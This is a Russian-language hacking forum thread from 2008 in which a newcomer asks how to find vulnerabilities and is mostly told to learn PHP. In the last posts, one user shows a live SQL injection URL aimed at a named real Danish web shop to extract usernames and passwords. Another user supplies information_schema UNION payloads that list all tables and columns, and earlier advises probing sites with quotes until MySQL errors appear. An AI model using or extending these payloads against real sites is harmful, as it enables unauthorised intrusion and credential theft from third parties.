ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.05.2008, 19:45
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
samarin, как ты можешь найти уязвимость в коде, не зная языка? учи язык и всё.
|
|
|
22.05.2008, 20:02
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Сообщение от n0ne
samarin, как ты можешь найти уязвимость в коде, не зная языка? учи язык и всё.
ок. Но одним языком сыт не будешь. Нужно понять принцип нахождения уязвимостей. Ведь взять для примера людей, которые хорошо знают язык, пишут всякие cms, форумы и т.д. Но сами они, в большинстве, не могут находить уязвимости.
-------------------------------------------------------------
читать код можно не умея программировать.
-------------------------------------------------------------
Я очень быстро учусь чему-то(если хорошо подсказывают )). И мне важно понять принцип.
|
|
|
|
22.05.2008, 23:31
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
читать код можно не умея программировать.
ну-ну. А ты умеешь говорить по испански, незная ниодного испанского слова?
Учи PHP для начала
|
|
|
|
23.05.2008, 01:26
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Spyder - разве я сказал, что не знаю пхп?
Я знаю пхп на уровне ... второго класса )) (могу ,более менее, читать код) - это как испанский со словарем ))
--------------------------------------------------------------
если это и есть ответ на мой вопрос, что ж буду грызть книги по php 
|
|
|
|
23.05.2008, 01:31
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
samarin, просто ты не поймешь почему уязвимость именно тут, и почему это уязвимость и как оно вообще работает, не зная языка. А если просто показать пару шаблонов, то так и будешь "подставлять кавычку" )) Вообщем, надо учить язык, ты это уже и так понял и Spyder ещё сказал)
|
|
|
|
23.05.2008, 01:39
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
n0ne - Да, спасибо! Как повышу свой уровень знаний пхп обязательно подниму тему еще раз.
------------------------
какие книги на ваш взгляд самые удачные, чтобы начать детальное(а главное правильное)изучение языка?
|
|
|
|
23.05.2008, 08:56
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
samarin, www.intuit.ru - там есть довольно неплохие курсы по php. А потом читай статьи и книги по безопасному программированию на php и была неплохая книженция "php глазами хакера", если не ошибаюсь.
|
|
|
|
23.05.2008, 09:18
|
|
Banned
Регистрация: 22.05.2008
Сообщений: 7
Провел на форуме:
23099
Репутация:
-22
|
|
samarin, подставляй ковычки в конце адресной строки пока не увидишь надпись MySQL Syntax Error
|
|
|
|
23.05.2008, 09:33
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659
Репутация:
34
|
|
никак не могу найти название таблицы
http://www.denarms.dk/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangs kode)+from+???/*
|
|
|
|
23.05.2008, 09:38
|
|
Banned
Регистрация: 22.05.2008
Сообщений: 7
Провел на форуме:
23099
Репутация:
-22
|
|
Сообщение от 1SeTh
никак не могу найти название таблицы
+union+select+table_name+from+information_schema.t ables/* - все названия таблиц
+union+select+column_name+from+information_schema. columns/* - все названия столбцов
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
